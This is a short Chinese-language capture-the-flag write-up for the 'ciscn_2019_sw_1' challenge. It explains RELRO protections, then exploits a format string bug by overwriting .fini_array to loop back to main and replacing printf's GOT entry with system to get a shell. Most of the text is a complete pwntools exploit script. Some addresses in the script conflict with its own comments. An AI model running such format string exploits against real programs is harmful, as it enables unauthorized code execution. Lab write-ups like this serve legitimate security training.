image.png
    这里这个relro是关闭的,init.array,fini.array,plt和got都可以改,可读可写,如果开了部分的话,init.array和fini.array可读不可写,plt和got可读可写;全开就都不行
    image.png
    函数很明显格式化字符串漏洞但是只有一轮,所以我们要多轮,如何可以改fini.array为main函数就能实现多轮,然后再改printf_got为system_plt就能getshell
    https://www.anquanke.com/post/id/180009
    这个博客写的比较详细了,我就不多写了

    1. #coding:utf8
    2. from pwn import *
    3. io = process("./ciscn_2019_sw_1")
    4. #io = remote("node4.buuoj.cn",29633)
    5. elf = ELF("./ciscn_2019_sw_1")
    6. system_plt = 0x080383d0    #0x080498a4
    7. printf_got = elf.got["printf"]    #0x0804989c
    8. system_got =0x080498a4
    9. fini_array = 0x0804979C
    10. main_addr = 0x08048534
    11. payload = p32(fini_array)+p32(fini_array+2)+p32(printf_got)+p32(printf_got+2)
    13. payload += "%"+str(main_addr&0xffff-0x10)+"c%4$hn"
    14. payload +="%"+str(0x10804-0x8534)+"c%5$hn"
    15. payload +="%"+str(0x183d0-0x10804)+"c%6$hn"
    16. payload +="%"+str(0x20804-0x183d0)+"c%7$hn"
    17. # gdb.attach(io,"b *0x080485A7")
    18. # pause()
    19. io.send(payload)
    20. io.sendline("/bin/sh\x00")
    21. io.interactive()